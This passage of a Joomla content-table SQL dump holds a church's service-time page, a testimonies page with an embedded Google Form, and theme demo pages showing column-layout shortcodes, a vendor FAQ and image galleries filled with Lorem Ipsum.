(28, 82, 'Service Time', 'service-time', '<p>[row][column one-half][block-number]1[/block-number] Midweek Service: Living by the Answer<br />Wednesday: 4pm.[/column]</p>\r\n<p>[column one-half][block-number]2[/block-number] Counseling<br />Thursday: 12noon - 2pm. [/column][/row]</p>\r\n<hr />\r\n<p>[row][column one-half][block-number]3[/block-number]  Deliverance Clinic<br />Saturday: 8am - 10am.[/column]</p>\r\n<p>[column one-half][block-number]4[/block-number]Main Service</p>\r\n<p>Sunday: 7am – 11am.[/column][/row]</p>\r\n<hr />\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>', '', 1, 20, '2012-03-31 02:08:09', 196, '', '2017-05-03 00:06:09', 196, 0, '0000-00-00 00:00:00', '2012-03-31 02:08:09', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 43, 3, '', '', 1, 17006, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(29, 83, 'Column Blocks', 'column-blocks', '<p>[row][column one-half][h3 dotted]<strong>One</strong> Half[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.[/column]</p>\r\n<p>[column one-half][h3 dotted]<strong>One</strong> Half[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.[/column][/row]</p>\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>row<i>]</i>\r\n<i>[</i>column one-half<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-half<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>[/toggle]\r\n<hr class=\"divide\" />\r\n<p>[row][column one-third][h3 dotted]<strong>One</strong> Third[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.[/column]</p>\r\n<p>[column one-third][h3 dotted]<strong>One</strong> Third[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.[/column]</p>\r\n<p>[column one-third][h3 dotted]<strong>One</strong> Third[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.[/column][/row]</p>\r\n<p> </p>\r\n<p>[row][column one-third][h3 dotted]<strong>One</strong> Third[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type book.[/column]</p>\r\n<p>[column two-thirds][h3 dotted]<strong>Two</strong> Thirds[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book and another book.[/column][/row]</p>\r\n[toggle state=\"code\" title=\"show code\"]\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-third<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-third<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-third<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-third<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column two-thirds<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n[/toggle]\r\n<hr class=\"divide\" />\r\n<p>[row][column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column][/row]</p>\r\n<p> </p>\r\n<p>[row][column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column two-fourths][h3 dotted]<strong>Two</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column][/row]</p>\r\n<p> </p>\r\n<p>[row][column one-fourth][h3 dotted]<strong>One</strong> Fourth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column three-fourths][h3 dotted]<strong>Three</strong> Fourths[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book and another specimen book.[/column][/row]</p>\r\n\r\n[toggle state=\"code\" title=\"show code\"]\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column two-fourths<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-fourth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column three-fourths<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n[/toggle]\r\n<hr class=\"divide\" />\r\n<p>[row][column one-fifth][h3 dotted]<strong>One</strong> Fifth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fifth][h3 dotted]<strong>One</strong> Fifth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fifth][h3 dotted]<strong>One</strong> Fifth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fifth][h3 dotted]<strong>One</strong> Fifth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-fifth][h3 dotted]<strong>One</strong> Fifth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column][/row]</p>\r\n\r\n[toggle state=\"code\" title=\"show code\"]\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-fifth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fifth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fifth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fifth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-fifth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n[/toggle]\r\n<hr class=\"divide\" />\r\n<p>[row][column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column]</p>\r\n<p>[column one-sixth][h3 dotted]<strong>One</strong> Sixth[/h3]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s.[/column][/row]</p>\r\n\r\n[toggle state=\"code\" title=\"show code\"]\r\n<i>[</i>row<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>column one-sixth<i>]</i>your text here<i>[</i>/column<i>]</i>\r\n<i>[</i>/row<i>]</i>\r\n\r\n[/toggle]', '', 1, 19, '2012-03-31 06:53:21', 196, '', '2014-07-14 13:40:31', 42, 0, '0000-00-00 00:00:00', '2012-03-31 06:53:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 41, 1, '', '', 1, 9009, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(31, 85, 'Testimonies', 'testimonies', '<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSebUPH4FOWETwrGDQ99uSCUEnV51WPZk6CcfL7SUnpXaebp0Q/viewform?embedded=true\" width=\"860\" height=\"1300\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">Loading...</iframe>', '', 1, 20, '2012-03-31 13:49:05', 196, '', '2017-01-18 19:44:35', 196, 0, '0000-00-00 00:00:00', '2012-03-31 13:49:05', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 27, 2, '', '', 1, 6674, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(32, 86, 'Frequently Asked Questions', 'frequently-asked-questions', '[toggle state=\"open\" title=\"Are you available for freelance work?\"]Yes I am! just contact me using the contact form on the right and indicate your budget and a detailed scope of your work. For theme customization my hourly rate is $65.[/toggle]\r\n\r\n[toggle state=\"open\" title=\"Where can I find a wordpress/Joomla version?\"]Yes I am! just contact me using the contact form on the right and indicate your budget and a detailed scope of your work.A. Lorem ipsum dolor amit I will embark on designing the HTML site first before venturing into a CMS theme. Depending on the feedback i get from buyers, I will select themes that I convert to CMS and they will be available on Themeforest or on my site.[/toggle]\r\n\r\n[toggle state=\"closed\" title=\"I bought your theme and I like it, but I need help with ABC\"]A. Thank you! I will answer all of your questions\r\n[list style=\"list-icons\"]\r\n   [li icon=\"icon-chevron-right\"]At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/li]\r\n   [li icon=\"icon-chevron-right\"]Justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/li]\r\n   [li icon=\"icon-chevron-right\"]Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/li]\r\n[/list]\r\n[/toggle]\r\n\r\n[toggle state=\"closed\" title=\"I bought your theme but I think you should include ABC\"]A. Please explain what I should improve and I\'ll add it to my to-do list Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/toggle]\r\n\r\n[toggle state=\"closed\" title=\"Is there documentation available for this theme?\"]A. Yes, a full documentation is available! Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/toggle]\r\n\r\n[toggle state=\"closed\" title=\"I would like to see more work from you\"]A. Sure, we are busy designing some real nice stuff to be uploaded pretty soon Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est At vero eos et accusam et justo duo dolores et ea rebum[/toggle]\r\n\r\n[toggle state=\"closed\" title=\"Can toggles support child toggles?\"]Yes I am! just contact me using the contact form on the right and indicate your budget and a detailed scope of your work. For theme customization my hourly rate is $65.\r\n\r\n[child_toggle state=\"open\" title=\"This is a child toggle A\"]A. Yes, a full documentation is available! Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren[/child_toggle]\r\n\r\n[child_toggle state=\"closed\" title=\"This is a child toggle B\"]A. Yes, a full documentation is available! Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren[/child_toggle]\r\n\r\n[child_toggle state=\"closed\" title=\"This is a child toggle C\"]A. Yes, a full documentation is available! Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren[/child_toggle]\r\n\r\n[/toggle]', '', 1, 20, '2012-04-02 11:19:15', 196, '', '2014-07-22 08:36:42', 42, 0, '0000-00-00 00:00:00', '2012-04-02 11:19:15', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 1, '', '', 1, 1302, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(37, 92, '2 Column Gallery', '2-column-gallery', '[grid]\r\n[column size=\"1-2\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/1.jpg\" alt=\"gallery\" /></a></p>\r\n[/column] \r\n[column size=\"1-2\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/2.jpg\" alt=\"gallery\" /></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n[grid]\r\n[column size=\"1-2\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/3.jpg\" alt=\"gallery\" /></a></p>\r\n[/column]\r\n[column size=\"1-2\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/4.jpg\" alt=\"gallery\" /></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/1.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column] \r\n\r\n<i>[</i>column size=\"1-2\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_2/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"594\" height=\"394\" src=\"images/demo/gallery/column_2/2.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 19, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:19:29', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 14, 10, '', '', 1, 824, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(38, 93, '3 Column Gallery', '3-column-gallery', '[grid]\r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/1.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column] \r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/2.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column]\r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/3.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n[grid]\r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/4.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column]\r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/5.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column]\r\n[column size=\"1-3\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/6.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /><span class=\"gallery-desc\"><strong>Lorem ipsum dolor sit amet</strong>arcu sit ipsum dolor sit amet</span></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-3\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"383\" height=\"253\" src=\"images/demo/gallery/column_3/1.jpg\" alt=\"gallery\" /&gt;&lt;span class=\"gallery-desc\"&gt;&lt;strong&gt;Lorem ipsum dolor sit amet&lt;/strong&gt;arcu sit ipsum dolor sit amet&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column] \r\n\r\n<i>[</i>column size=\"1-3\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"383\" height=\"253\" 